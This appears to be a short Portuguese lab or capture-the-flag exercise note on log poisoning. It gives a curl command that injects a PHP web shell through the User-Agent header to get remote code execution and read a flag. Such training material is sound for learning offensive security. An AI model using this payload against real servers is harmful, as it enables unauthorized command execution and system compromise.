Log Poisoning - 1

1. Use qualquer uma das técnicas abordadas nesta seção para obter RCE e, em seguida, envie a saída do seguinte comando: pwd

• Envenenar o log enviando uma solicitação via curl

curl -s "http://<SERVER_IP>:<PORT>/index.php" -A "<?php system($_GET['cmd']); ?>"

• Capturar as requisições com o burpsuite

1. Tente usar uma técnica diferente para ganhar RCE e leia a bandeira em /